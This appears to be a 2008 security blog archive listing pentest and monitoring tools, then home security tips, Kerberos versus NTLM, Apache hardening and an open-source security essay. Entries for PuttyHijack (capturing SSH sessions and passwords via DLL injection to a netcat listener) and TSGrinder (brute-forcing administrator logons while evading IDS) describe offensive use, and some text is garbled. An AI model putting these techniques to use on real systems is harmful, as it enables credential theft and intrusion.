10/22/08
PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows
This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for acallback connection that is then used for input/output redirection.
It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
Details
1) Start a nc listener
2) Run PuttyHijack specify the listener ip and port
3) Watch the echoing of everything including passwords
Some basic commands in this version include;
!disco - disconnect the real putty from the display!reco - reconnect it!exit - just another way to exit the injected shell
You can download PuttyHijack V1.0 here:
PuttyHijackV1.0.rar
Or read more here.
PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows
This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for acallback connection that is then used for input/output redirection.
It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
Details
1) Start a nc listener
2) Run PuttyHijack specify the listener ip and port
3) Watch the echoing of everything including passwords
Some basic commands in this version include;
!disco - disconnect the real putty from the display!reco - reconnect it!exit - just another way to exit the injected shell
You can download PuttyHijack V1.0 here:
PuttyHijackV1.0.rar
Or read more here.
TSGrinder - Brute Force Terminal Services Server
TSGrinder is the first production Terminal Server brute force tool, and is now in release 2. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts.
TSGringer is a “dictionary” based attack tool, but it does have some interesting features like “l337″ conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try ausername/password combination within a particular connection.
You can download TSGrinder 2.0.3 here:
tsgrinder-2.03.zip
Note that the tool requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:
roboclient.zip
Or read more here.
Vista Security Feature - Teredo Protocol Analysis
Primary concerns include bypassing security controls, reducing defense in depth, and allowing unsolicited traffic. Additional security concerns associated with the use of Teredo include the capability of remote nodes to open the NAT for themselves, benefits to worms, ways to deny Teredo service, and the difficulty in finding all Teredo traffic to inspect.
You can find the report here:
Teredo Security [PDF]
Fake NetBIOS Tool - Simulate Windows Hosts
FakeNetBIOS is a family of tools designed to simulate Windows hosts on a LAN. The individual tools are:
FakeNetbiosDGM (NetBIOS Datagram)
FakeNetbiosNS (NetBIOS Name Service)
Each tool can be used as a standalone tool or as a honeyd responder or subsystem.
FakeNetbiosDGM sends NetBIOS Datagram service packets on port UDP 138 to simulate Windows hosts bradcasts. It sends periodically NetBIOS announces over the network to simulate Windows computers. It fools the Computer Browser services running over the LAN and so on.
FakeNetbiosNS is a NetBIOS Name Service daemon, listening on port UDP 137. It responds to NetBIOS Name requests like real Windows computers: for example ‘ping -a’, ‘nbtstat -A’ and ‘nbtstat -a’, etc.
You can download the tools here:
FakeNetBIOS-0.91.zip
There are a few others things here:
http://honeynet.rstack.org/tools.php
Nemesis - Packet Injection Suite
Nemesis can natively craft and inject packets for:
ARP
DNS
ETHERNET
ICMP
IGMP
IP
OSPF
RIP
TCP
UDP
Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.
Unix-like systems require: libnet-1.0.2a, and a C compiler (GCC)Windows systems require: libnetNT-1.0.2g and either WinPcap-2.3 or WinPcap-3.0
Download it here:
Source code: nemesis-1.4.tar.gz (Build 26)Windows binary: nemesis-1.4.zip (Build 26) (includes LibnetNT)
You can read more here:
Nemisis at Sourceforge
ARP Scanning and Fingerprinting Tool - arp-scan
It has been tested under various Linux based operating systems and seems to work fine.
This will only compile on Linux systems. You will need a C compiler, the “make” utility and the appropriate system header files to compile arp-scan. It uses autoconf and automake, so compilation and installation is the normal ./configure; make; make install process.
You can download arp-scan here:
http://www.nta-monitor.com/tools/arp-scan/download/arp-scan-1.4.tar.gz
Please read the man pages arp-scan(1), arp-fingerprint(1) and get-oui(1) before using this tool.
Babel Enterprise - Cross Platform System Auditing Tool
Babel Enterprise has being designed to manage security on many different systems, different technologies and versions, and different issues and requirements. It is a distributed management system, multi-user, that allows redundant installation in all its critical components. Each change occurring in the system can be watched and marked automatically each time a new audit policy is executed. Users can add, delete or modify existing elements to see exactly if the system works better or worse and why. Babel Enterprise uses a pragmatic approach, evaluating those aspects of the system the represent a security risk and that can be improved with the intervention of an administrator.
Babel Enterprise has a version of its agent for each of the latest Microsoft operating systems, Windows 2003 and Windows XP, and the main Unix system: Solaris 10, AIX 5.x, SUSE GNU/Linux 9 ES and Ubuntu Dapper, although they can be easily adapted to different versions and other UNIX OSs (such as BDS or HP-UX )
Babel currently has modules for auditing many different aspects of system security. These are some examples of currently implemented audit modules:
Service minimization.
Centralized file hashing.
Anomalous SUID0 executable detection.
File permissions checker.
Password strength tests.
Generic registry lookup (Windows)
Remote services configuration.
Audit for Kernel networking and security parameters.
Apache2 configuration auditing
User accounts auditing
Root environment audit
UID0 users detection.
Centralized patch management.
Centralized software inventory.
Listening ports auditing.
Inetd / Xinetd minimization.
You can download the latest stable version of Babel Enterprise here:
Babel Enterprise 1.0 version.
Or read more here.
Using the capture command in a Cisco Systems PIX firewall.
A vital tool to use when troubleshooting computer networking problems and monitoring computer networks is a packet sniffer. That being said, one of the best methods to use when troubleshooting connection problems or monitoring suspicious network activity in a Cisco Systems PIX firewall is by using the capture command. Many times Cisco TAC will request captures from a PIX in PCAP format for open problem tickets associated with unusual problems or activity associated with the PIX and the network.
Cisco kit can be a bit daunting for a newcomer, but very well featured, it’s important to learn what your PIX can do!
The capture command was first introduced to the PIX OS in version 6.2 and has the ability to capture all data that passes through the PIX device. You can use access-lists to specify the type of traffic that you wish to capture, along with the source and destination addresses and ports. Multiple capture statements can be used to attach the capture command to multiple interfaces. You can even copy the raw header and hexadecimal data in PCAP format to a tftp server and open it with TCPDUMP or Ethereal.
NOTE: You must be in privileged mode to invoke the capture command.
Full article here.
IPAudit - Network Activity Monitor with Web Interface
IPAudit can be used to monitor network activity for a variety of purposes. It has proved useful for monitoring intrusion detection, bandwith consumption and denial of service attacks. It can be used with IPAudit-Web to provide web based network reports.
IPAudit is a free network monitoring program available and extensible under the GNU GPL.
IPAudit is a command line tool that uses the libpcap library to listen to traffic and generate data. The IPAudit-Web package includes the IPAudit binary in addition to the web interface that creates reports based on the collected data. Using the Web package is recommended, as it gives you a slick graphical interface complete with traffic charts and a search feature.
You can download IPAudit here:
IPAudit 0.95 - Latest stable version of IPAudit
Or read more here.
You can also find a very good introduction to IPAudit by SecurityFocus here.
argus - Auditing Network Activity - Performance & Status Monitoring
Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.
Argus can be used to analyze and report on the contents of packet capture files or it can run as a continuous monitor, examining data from a live interface; generating an audit log of all the network activity seen in the packet stream. Argus can be deployed to monitor individual end-systems, or an entire enterprises network activity. As a continuous monitor, Argus provides both push and pull data handling models, to allow flexible strategies for collecting network audit data. Argus data clients support a range of operations, such as sorting, aggregation, archival and reporting. There is XML support for Argus data, which makes handling Argus data a bit easier.
Argus currently runs on Linux, Solaris, FreeBSD, OpenBSD, NetBSD, and MAC OS X and its client programs have also been ported to Cygwin. The software should be portable to many versions of Unix with little or no modification. Performance is such that auditing an entire enterprises Internet activity can be accomplished using modest computing resources.
You can download argus here:
argus-2.0.6 (various options available)
Or read more here.
Slavasoft FSUM and Hashcalc md5 & File Integrity for Windows
You can easily use FSUM with a batch wrapper to do automated file integrity monitoring, and use something like blat to email you any दिफ्फेरेंसस।
The most common use for FSUM is checking data files for corruption। A message digest or checksum calculation might be performed on data before transferring it from one location to another. Making the same calculation after the transfer and comparing the before and after results, you can determine if the received data is corrupted or not. If the results match, then the received data is likely accurate.
You can download FSUM here:
FSUM 2.52
Or read more here.
raWPacket HeX - Network Security Monitoring & Analysis LiveCD
HeX Main Features
HeX Main Menu - Cleaner look and more user interface oriented and maximum 4 levels depth HeX Main Menu allows quick access to all the installed applications in हेक्स।
Terminal - This is exactly what you need, the ultimate analyzt console!
Instant access to all the Network Security Monitoring(NSM) and Network Based Forensics(NBF) Toolkits via Fluxbox Menu। We have also categorized them nicely so that you know what to use conditionally or based on scenario.
Instant access to the Network Visualization Toolkit, you can watch the network traffics in graphical presentation and that assist you in identifying large scale network attacks easily।
Instant access to Pcap Editing Tools which you can use to modify or anonymize the pcap data, it’s great especially when you want to share your pcap data।
Network and Pentest Toolkits contain a lot of tools to perform network or application based attacks, you can generate malicious packets using them and study malicious packets using those analysis tools listed in NSM-Toolkit and NBF-Toolkit as well।
While we think HeliX liveCD is better choice in digital forensics arsenal, Forensics-Toolkit can be considered as the add-on for people who are interested in doing digital forensics.
Under Applications, there are Desktop, Sysutils and Misc, all of them are pretty self-explained and contain user based applications such as Firefox, Liferea, Xpdf and so forth. Additionally, Misc contains some useful scripts, for example you can just start ssh service by clicking on SSHD-Start.
You can download HeX 1.0.3 here:
hex-i386-1.0.3.iso
NetworkMiner - Passive Sniffer & Packet Analysis Tool for Windows
NetworkMiner makes use of OS fingerprinting databases from both p0f (by Michal Zalewski) and Ettercap (by Alberto Ornaghi and Marco Valleri) in order to do as correct passive OS fingerprinting as possible। NetworkMiner also uses the MAC-vendor list from Nmap (Fyodor).
The purpose of NetworkMiner is to collect data about hosts on the network rather than to collect data regarding the traffic on the network. The main view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).
NetworkMiner can extract files transferred over the network by parsing a PCAP file or by sniffing traffic directly from the network. This is a neat function that can be used to extract and save media files (such as audio or video files) which are streamed across a network.
Another very useful feature is that the user can search sniffed or stored data for keywords। NetworkMiner allows the user to insert arbitrary string or byte-patterns that shall be searched for with the keyword search functionality.
A feature the author wants to include in future versions of NetworkMiner is to use statistical methods to do protocol identification (protocol fingerprinting) of a TCP session or UDP data. This means that instead of looking at the port number to guess which protocol is used on top of the TCP/UDP packet NetworkMiner will identify the correct protocol based on the TCP/UDP packet content. In this way NetworkMiner will be able to identify protocols even if the service is run on a non-standard port.
You can download NetworkMiner here:
NetworkMiner-0.82
Or you can read more here.
SWFIntruder - Analysis and Security Testing of Flash Applications
I did mention a Flash decompiler a while back, now we have SWFIntruder (pronounced Swiff Intruder), which is apparently the first tool specifically developed for analyzing and testing security of Flash applications at runtime।
It helps to find flaws in Flash applications using the methodology originally described in Testing Flash Applications and in Finding Vulnerabilities in Flash Applications.
Features
Basic predefined attack patterns.
Highly customizable attacks.
Highly customizable undefined variables.
Semi automated XSS check.
User configurable internal parameters.
Log Window for debugging and tracking.
History of latest 5 tested SWF files.
ActionScript Objects runtime explorer in tree view.
Persistent Configuration and Layout।
SWFIntruder was developed using ActionScript, Html and JavaScript resulting in a tool taking advantage of the best features of those technologies in order to get the best capabilities for analysis and interaction with the testing Flash movies.
SWFIntruder was developed by using only open source software. Thanks to its generality, SWFIntruder is OS independant.
You can download SWFIntruder here:
swfintruder-0.9.1.tgz
Or read more here.
lm2ntcrack - Microsoft Windows NT Hash Cracker (MD4 -LM)
This tool is for instantly cracking the Microsoft Windows NT Hash (MD4) when the LM Password is already known, you might be familiar with LM Cracking tools such as LCP।
थe main problem is you’ve got the LM password, but it’s in UPPERCASE because LM hashes are not case sensitive, so you need to find the actual password for the account.
Example : Password cracker output for “Administrator” account
LM password is ADMINISTRAT0R.
NT password is ?????????????.
We aren’t lucky because the case-sensitive password isn’t “administrat0r” or “Administrat0r”. So you cannot use this to connect to the audited Windows system.
This password contains 13 characters but launching my password cracker on the NT hash is a waste of time and there is a poor chance of success.
Note :
Password length : 13 characters.
Details : 1 number + 12 case-sensitives letters.
Possibilities : 2^12 = 4096 choices.
In this example, lm2ntcrack will generate the 4096 possibilities for the password ADMINISTRAT0R and, for each one, the associated NT MD4 hash. Then, search for matching with the dumped hash.
Execution time : < 2 seconds to crack more than 1200 NT Hashes.
You can download lm2ntcrack here:
lm2ntcrack-current.tgz
Or read more here.
10/21/08
Tips for safe computing
But that's not true, and the reality is more complicated. You're screwed if you do nothing to protect yourself, but there are many things you can do to increase your security on the Internet.
Two years ago, I published a list of PC security recommendations. The idea was to give home users concrete actions they could take to improve security. This is an update of that list: a dozen things you can do to improve your security.
General
Turn off the computer when you're not using it, especially if you have an "always on" Internet connection.
Laptop security
Keep your laptop with you at all times when not at home; treat it as you would a wallet or purse. Regularly purge unneeded data files from your laptop. The same goes for PDAs. People tend to store more personal data--including passwords and PINs--on PDAs than they do on laptops.
Backups Back up regularly. Back up to disk, tape or CD-ROM. There's a lot you can't defend against; a recent backup will at least let you recover from an attack. Store at least one set of backups off-site (a safe-deposit box is a good place) and at least one set on-site. Remember to destroy old backups. The best way to destroy CD-Rs is to microwave them on high for five seconds. You can also break them in half or run them through better shredders.
Operating systems
If possible, don't use Microsoft Windows. Buy a Macintosh or use Linux. If you must use Windows, set up Automatic Update so that you automatically receive security patches. And delete the files "command.com" and "cmd.exe."
Applications
Limit the number of applications on your machine. If you don't need it, don't install it. If you no longer need it, uninstall it. Look into one of the free office suites as an alternative to Microsoft Office. Regularly check for updates to the applications you use and install them. Keeping your applications patched is important, but don't lose sleep over it.
Browsing
Don't use Microsoft Internet Explorer, period. Limit use of cookies and applets to those few sites that provide services you need. Set your browser to regularly delete cookies. Don't assume a Web site is what it claims to be, unless you've typed in the URL yourself. Make sure the address bar shows the exact address, not a near-miss.
Web sites
Secure Sockets Layer (SSL) encryption does not provide any assurance that the vendor is trustworthy or that its database of customer information is secure.
Think before you do business with a Web site. Limit the financial and personal data you send to Web sites--don't give out information unless you see a value to you. If you don't want to give out personal information, lie. Opt out of marketing notices. If the Web site gives you the option of not storing your information for later use, take it. Use a credit card for online purchases, not a debit card.
Passwords
You can't memorize good enough passwords any more, so don't bother. For high-security Web sites such as banks, create long random passwords and write them down. Guard them as you would your cash: i.e., store them in your wallet, etc.
Never reuse a password for something you care about. (It's fine to have a single password for low-security sites, such as for newspaper archive access.) Assume that all PINs can be easily broken and plan accordingly.
Never type a password you care about, such as for a bank account, into a non-SSL encrypted page. If your bank makes it possible to do that, complain to them. When they tell you that it is OK, don't believe them; they're wrong.
Turn off HTML e-mail. Don't automatically assume that any e-mail is from the "From" address.
Delete spam without reading it. Don't open messages with file attachments, unless you know what they contain; immediately delete them. Don't open cartoons, videos and similar "good for a laugh" files forwarded by your well-meaning friends; again, immediately delete them.
Never click links in e-mail unless you're sure about the e-mail; copy and paste the link into your browser instead. Don't use Outlook or Outlook Express. If you must use Microsoft Office, enable macro virus protection; in Office 2000, turn the security level to "high" and don't trust any received files unless you have to. If you're using Windows, turn off the "hide file extensions for known file types" option; it lets Trojan horses masquerade as other types of files. Uninstall the Windows Scripting Host if you can get along without it. If you can't, at least change your file associations, so that script files aren't automatically sent to the Scripting Host if you double-click them.
Antivirus and anti-spyware software
Use it--either a combined program or two separate programs. Download and install the updates, at least weekly and whenever you read about a new virus in the news. Some antivirus products automatically check for updates. Enable that feature and set it to "daily."
Firewall
Spend $50 for a Network Address Translator firewall device; it's likely to be good enough in default mode. On your laptop, use personal firewall software. If you can, hide your IP address. There's no reason to allow any incoming connections from anybody.
Encryption
Install an e-mail and file encryptor (like PGP). Encrypting all your e-mail or your entire hard drive is unrealistic, but some mail is too sensitive to send in the clear. Similarly, some files on your hard drive are too sensitive to leave unencrypted.
None of the measures I've described are foolproof. If the secret police wants to target your data or your communications, no countermeasure on this list will stop them. But these precautions are all good network-hygiene measures, and they'll make you a more difficult target than the computer next door. And even if you only follow a few basic measures, you're unlikely to have any problems.
I'm stuck using Microsoft Windows and Office, but I use Opera for Web browsing and Eudora for e-mail. I use Windows Update to automatically get patches and install other patches when I hear about them. My antivirus software updates itself regularly. I keep my computer relatively clean and delete applications that I don't need. I'm diligent about backing up my data and about storing data files that are no longer needed offline.
I'm suspicious to the point of near-paranoia about e-mail attachments and Web sites. I delete cookies and spyware. I watch URLs to make sure I know where I am, and I don't trust unsolicited e-mails. I don't care about low-security passwords, but try to have good passwords for accounts that involve money. I still don't do Internet banking. I have my firewall set to deny all incoming connections. And I turn my computer off when I'm not using it.
That's basically it. Really, it's not that hard. The hardest part is developing an intuition about e-mail and Web sites. But that just takes experience.
10/20/08
Kerberos VS NTLM
NTLM Authentication: Challenge- Response mechanism.
In the NTLM protocol, the client sends the user name to the server; the server generates and sends a challenge to the client; the client encrypts that challenge using the user’s password; and the client sends a response to the server.If it is a local user account, server validate user's response by looking into the Security Account Manager; if domain user account, server forward the response to domain controller for validating and retrive group policy of the user account, then construct an access token and establish a session for the use.
Kerberos authentication: Trust-Third-Party Scheme.
Kerberos authentication provides a mechanism for mutual authentication between a client and a server on an open network.The three heads of Kerberos comprise the Key Distribution Center (KDC), the client user and the server with the desired service to access. The KDC is installed as part of the domain controller and performs two service functions: the Authentication Service (AS) and the Ticket-Granting Service (TGS). When the client user log on to the network, it request a Ticket Grant Ticket(TGT) from the AS in the user's domain; then when client want to access the network resources, it presents the TGT, an authenticator and Server Principal Name(SPN) of the target server, contact the TGS in the service account domain to retrive a session ticket for future communication w/ the network service, once the target server validate the authenticator, it create an access token for the client user.
NTLM is a challenge/response-based authentication protocol that is the default authentication protocol of Windows NT 4.0 and earlier Windows versions. For backward compatibility reasons, Microsoft still supports NTLM in Windows Vista, Windows Server 2003 and Windows 2003 R2, Windows 2000, and Windows XP.
Starting with Win2K, Microsoft implements Kerberos as the default authentication protocol for the Windows OS. This means that besides an NTLM authentication provider, every Windows OS since Win2K also includes a client Kerberos authentication provider.
below, compares Kerberos to NTLM, the default authentication protocol of NT 4.0 and earlier Windows versions. The next paragraphs expand on some of the major feature differences between the Kerberos and the NTLM authentication protocols and explain why generally Kerberos is considered a better authentication option than NTLM.
Faster authentication. When a resource server gets Kerberos authentication information (in Kerberos speak "tickets" and "authenticators") from a client, the resource server has enough information to authenticate the client. The NTLM authentication protocol requires resource servers that aren't domain controllers (DCs), to contact a DC to validate a user's authentication request. This process is known as pass-through authentication. Thanks to its unique ticketing system, Kerberos doesn't need pass-through authentication and therfore accelerates the authentication process.
Mutual authentication. Kerberos can support mutual authentication. Mutual authentication means that not only the client authenticates to the service, but also the service authenticates to the client. Mutual authentication is a Kerberos option that the client can request. The support for mutual authentication is a key difference between Kerberos and NTLM. The NTLM challenge-response mechanism only provides client authentication. In the NTLM authentication exchange, the server generates an NTLM challenge for the client, the client calculates an NTLM response, and the server validates that response. Using NTLM, users might provide their credentials to a bogus server.
Kerberos is an open standard. Microsoft based its Kerberos implementation on the standard defined in Request for Comments (RFC) 4120. RFC 4120 defines version 5 of the Kerberos protocol. Because Kerberos is defined in an open standard, it can provide single sign-on (SSO) between Windows and other OSs supporting an RFC 4120-based Kerberos implementation. You can download RFC 4120 from the Internet Engineering Task Force (IETF) at http://www.ietf.org. NTLM is a proprietary authentication protocol defined by Microsoft. The NTLM protocol is not specified in an open standard document (for example in an IETF RFC).
Support for authentication delegation. Thanks to authentication delegation, a service can access remote resources on behalf of a user. What delegation really means is that user A can give rights to an intermediary machine B to authenticate to an application server C as if machine B was user A. This means that application server C will base its authorization decisions on user A's identity rather than on machine B's account. Delegation is also known as authentication forwarding. You can use delegation for authentication in multi-tier applications. An example is database access using a Web-based front-end application. In a multi-tier application, authentication happens on different tiers. In such a setup, if you want to set authorization on the database using the user's identity, you should be capable of using the user's identity for authentication both on the Web server and the database server. This is impossible if you use NTLM for authentication on every link, simply because NTLM doesn't support delegation.
Support for smart card logon. Through the Kerberos PKINIT extension, Win2K and later versions include support for the smart card logon security feature. Smart card logon provides much stronger authentication than password logon because it relies on a two-factor authentication. To log on, a user needs to possess a smart card and know its PIN code. Smart card logon also offers other security advantages. For example, it can block Trojan horse attacks that try to grab a user's password from the system memory. The NTLM authentication protocol doesn't support smart card logon.
10/16/08
Apache Security Tips
The Apache HTTP Server has a good record for security and a developer community highly concerned about security issues. But it is inevitable that some problems -- small or large -- will be discovered in software after it is released. For this reason, it is crucial to keep aware of updates to the software. If you have obtained your version of the HTTP Server directly from Apache, we highly recommend you subscribe to the Apache HTTP Server Announcements List where you can keep informed of new releases and security updates. Similar services are available from most third-party distributors of Apache software.
Of course, most times that a web server is compromised, it is not because of problems in the HTTP Server code. Rather, it comes from problems in add-on code, CGI scripts, or the underlying Operating System. You must therefore stay aware of problems and updates with all the software on your system.
Permissions on ServerRoot Directories
In typical operation, Apache is started by the root user, and it switches to the user defined by the User directive to serve hits. As is the case with any command that root executes, you must take care that it is protected from modification by non-root users. Not only must the files themselves be writeable only by root, but so must the directories, and parents of all directories. For example, if you choose to place ServerRoot in /usr/local/apache then it is suggested that you create that directory as root, with commands like these:
mkdir /usr/local/apache
cd /usr/local/apache
mkdir bin conf logs
chown 0 . bin conf logs
chgrp 0 . bin conf logs
chmod 755 . bin conf logs
It is assumed that /, /usr, and /usr/local are only modifiable by root. When you install the httpd executable, you should ensure that it is similarly protected:
cp httpd /usr/local/apache/bin
chown 0 /usr/local/apache/bin/httpd
chgrp 0 /usr/local/apache/bin/httpd
chmod 511 /usr/local/apache/bin/httpd
can create an htdocs subdirectory which is modifiable by other users -- since root never executes any files out of there, and shouldn't be creating files in there.
If you allow non-root users to modify any files that root either executes or writes on then you open your system to root compromises. For example, someone could replace the httpd binary so that the next time you start it, it will execute some arbitrary code. If the logs directory is writeable (by a non-root user), someone could replace a log file with a symlink to some other system file, and then root might overwrite that file with arbitrary data. If the log files themselves are writeable (by a non-root user), then someone may be able to overwrite the log itself with bogus data.
Server Side Includes
Server Side Includes (SSI) present a server administrator with several potential security risks.
The first risk is the increased load on the server. All SSI-enabled files have to be parsed by Apache, whether or not there are any SSI directives included within the files. While this load increase is minor, in a shared server environment it can become significant.
SSI files also pose the same risks that are associated with CGI scripts in general. Using the exec cmd element, SSI-enabled files can execute any CGI script or program under the permissions of the user and group Apache runs as, as configured in httpd.conf.
There are ways to enhance the security of SSI files while still taking advantage of the benefits they provide.
To isolate the damage a wayward SSI file can cause, a server administrator can enable suexec as described in the CGI in General section.
Enabling SSI for files with .html or .htm extensions can be dangerous. This is especially true in a shared, or high traffic, server environment. SSI-enabled files should have a separate extension, such as the conventional .shtml. This helps keep server load at a minimum and allows for easier management of risk.
Another solution is to disable the ability to run scripts and programs from SSI pages. To do this replace Includes with IncludesNOEXEC in the Options directive. Note that users may still use <--#include virtual="..." --> to execute CGI scripts if these scripts are in directories designated by a ScriptAlias directive.
CGI in General
First of all, you always have to remember that you must trust the writers of the CGI scripts/programs or your ability to spot potential security holes in CGI, whether they were deliberate or accidental. CGI scripts can run essentially arbitrary commands on your system with the permissions of the web server user and can therefore be extremely dangerous if they are not carefully checked.
All the CGI scripts will run as the same user, so they have potential to conflict (accidentally or deliberately) with other scripts e.g. User A hates User B, so he writes a script to trash User B's CGI database. One program which can be used to allow scripts to run as different users is suEXEC which is included with Apache as of 1.2 and is called from special hooks in the Apache server code. Another popular way of doing this is with CGIWrap.
Non Script Aliased CGI
Allowing users to execute CGI scripts in any directory should only be considered if:
You trust your users not to write scripts which will deliberately or accidentally expose your system to an attack.
You consider security at your site to be so feeble in other areas, as to make one more potential hole irrelevant.
You have no users, and nobody ever visits your server.
Script Aliased CGI
Limiting CGI to special directories gives the admin control over what goes into those directories. This is inevitably more secure than non script aliased CGI, but only if users with write access to the directories are trusted or the admin is willing to test each new CGI script/program for potential security holes.
Most sites choose this option over the non script aliased CGI approach.
Other sources of dynamic content
Embedded scripting options which run as part of the server itself, such as mod_php, mod_perl, mod_tcl, and mod_python, run under the identity of the server itself (see the User directive), and therefore scripts executed by these engines potentially can access anything the server user can. Some scripting engines may provide restrictions, but it is better to be safe and assume not.
Protecting System Settings
To run a really tight ship, you'll want to stop users from setting up .htaccess files which can override security features you've configured. Here's one way to do it.
In the server configuration file, put
AllowOverride None
This prevents the use of .htaccess files in all directories apart from those specifically enabled.
Protect Server Files by Default
One aspect of Apache which is occasionally misunderstood is the feature of default access. That is, unless you take steps to change it, if the server can find its way to a file through normal URL mapping rules, it can serve it to clients.
For instance, consider the following example:
# cd /; ln -s / public_html
Accessing http://localhost/~root/
This would allow clients to walk through the entire filesystem. To work around this, add the following block to your server's configuration:
Order Deny,Allow Deny from all
This will forbid default access to filesystem locations. Add appropriate Directory blocks to allow access only in those areas you wish.
For example,
Order Deny,Allow
Allow from all
Order Deny,Allow
Allow from all
Pay particular attention to the interactions of Location and Directory directives; for instance, even if
Also be wary of playing games with the UserDir directive; setting it to something like ./ would have the same effect, for root, as the first example above. If you are using Apache 1.3 or above, we strongly recommend that you include the following line in your server configuration files:
UserDir disabled root
Watching Your Logs
To keep up-to-date with what is actually going on against your server you have to check the Log Files. Even though the log files only reports what has already happened, they will give you some understanding of what attacks is thrown against the server and allow you to check if the necessary level of security is present.
A couple of examples:
grep -c "/jsp/source.jsp?/jsp/ /jsp/source.jsp??" access_log
grep "client denied" error_log tail -n 10
The first example will list the number of attacks trying to exploit the Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability, the second example will list the ten last denied clients, for example:
[Thu Jul 11 17:18:39 2002] [error] [client foo.bar.com] client denied by server configuration: /usr/local/apache/htdocs/.htpasswd
As you can see, the log files only report what already has happened, so if the client had been able to access the .htpasswd file you would have seen something similar to:
foo.bar.com - - [12/Jul/2002:01:59:13 +0200] "GET /.htpasswd HTTP/1.1"
in your Access Log.
This means you probably commented out the following in your server configuration file:
Order allow,deny
Deny from all
How much Secure Open Source ??
The debate surrounding which is best, open source (often free) software or closed source commercial software, continues to rage. Proponents of open source claim that it not only saves money, but is also inherently more secure. The first claim might seem to be a given (although once you factor in learning curve, administrative overhead and support – or lack thereof – “free” software doesn’t always have as much of a TCO advantage as it would seem). The second claim is what we’ll discuss in this article. Is open source really inherently more secure than closed source commercial software? If so, why? And if not, why do so many have that perception?
What is Open Source, Anyway?
Before we can intelligently discuss the differences between open source and proprietary software, we need to clarify what the term really means. Many people equate “open source” with “free of charge,” but that’s not necessarily the case. Open source code can be – and is – the basis for products such as RedHat and dozens of other commercial distributions of Linux that range in cost from a few dollars to a few thousand (RedHat Enterprise Linux premium edition lists at $2499 for Intel x86, up to $18,000 for IBM S/390).
“Open source” also does not mean “unlicensed.” In fact, there are a whole slew of licenses under which open source software is distributed. Some of the most popular include GPL (the GNU Public License), BSD, and the Mozilla Public License. The Open Source Initiative (OSI), a non-profit corporation, has developed a certification process for licenses. You can see a list of open source licenses approved by OSI at http://opensource.org/licenses/.
The name itself tells the story: open source software means the source code (the programming often written in C, C++ or even assembler language) is available to anyone who wants it, and can be examined, changed and used to write additional programming. This is in contrast to “closed” or proprietary software such as Microsoft Windows, for which the source code is a closely guarded trade secret (except when it’s leaked to the public).
When Closed Source Comes Open
Which brings us to recent events: in early February, it was reported that part of the source code for Windows NT 4.0 and Windows 2000 had been leaked to the Internet. Files containing the code were posted to a number of P2P sites and were being eagerly downloaded. The available code comprised only a small portion of the entire code base for the operating systems, but the incident caused a great deal of consternation, both at Redmond and within the IT community.
Microsoft was understandably concerned about its intellectual property rights, but IT pundits played up the security angle. Many unnamed (and some named) “security experts” were quoted as saying the leaks of the source code present a serious security issue, and that hackers could use the information to launch new and improved attacks against the Windows operating systems.
Does This Mean Open Source is Less Secure?
These claims must seem confusing to those who have been listening to open source proponents, who for years have told us that their software is more secure precisely because the source code is readily available to everyone. If having the code “out there” makes Linux more secure, why would the same thing make Windows less secure?
Of course, Microsoft has always taken the opposite stance. During the anti-trust trials, they argued vehemently against the court’s proposed remedy of disclosing their source code based on the security risks of doing so.
Who’s right, then? All other issues aside, what are the security advantages and disadvantages of open source vs. proprietary software? Let’s take a look.
Security Through Obscurity
Vendors of proprietary software say keeping the source code closed makes their product more secure. This reasoning is based on logic; certainly you don’t want to advertise what goodies you have in your house and where they’re located to the neighborhood burglars.
Open source advocates counter that this is merely a form of “security through obscurity,” a concept that’s generally dismissed as ineffective in the IT community. And certainly, by itself it won’t protect you, as a homeowner or as a software vendor. Merely keeping quiet about your possessions might make it less likely that thieves will target you, but you’d be foolish to leave your doors unlocked at night just because you haven’t distributed information about what you own.
Keeping the source code closed might deter some hackers, but the large number of successful attacks against Windows and other proprietary software proves that it certainly doesn’t provide any kind of high level of security.
Speaking of the high rate of attacks against Windows, open sourcers often point to that as “proof” that their software is more secure. However, number of attacks doesn’t prove anything except that Windows is a more popular target. If 90% of the people in the neighborhood put their valuables in a particular brand of safe, the smart burglar is going to spend his time learning to crack that type of safe. The other 10% might use a brand that’s or equal or inferior quality, but they might be successfully attacked less often simply because the product they use is not as ubiquitous.
If you were a hacker, and the majority of systems you encountered ran Windows while a smaller number run a different OS, which one would you prefer to develop attacks and viruses for? Open source proponents are fond of “facts” that show more Windows machines are compromised, more Windows based Web sites are defaced, etc. But in fact, a lower attack rate that’s due to a smaller installed base is just one more form of security through obscurity.
Security Advantages – and Disadvantages – of Open Source
Those in favor of open source say that because everyone has access to the code, bugs and vulnerabilities are found more quickly and thus are fixed more quickly, closing up security holes faster. They also point out that any and everyone is free to create a better, more secure version of the software.
Those on the other side maintain that a closed system in which only trusted insiders debug the code makes it less likely that discovered vulnerabilities will be exploited before they can be patched.
They also point out that there are many reasons (in addition to market share) that are unrelated to the technical security of the software but that can account for a larger number of attacks against proprietary software. One is the nature of the “OS wars” – because open source software has traditionally been more difficult to use, those who gravitate toward it tend to be more technically savvy. The larger number of self-proclaimed hackers who are pro-open source and anti-Microsoft means there are more people out there with the motive and the means to write malicious code targeting Windows systems.
Of course, the open source people can respond that the very fact that Microsoft has more “enemies” makes their software inherently less secure because so many are trying to bring it down.
What’s the Answer?
It’s obvious that you can use both statistics and logic to support either side of the argument. Our discussion started off by asking whether open source software is inherently more secure than proprietary software. That is, does opening the source code in itself make it more secure?
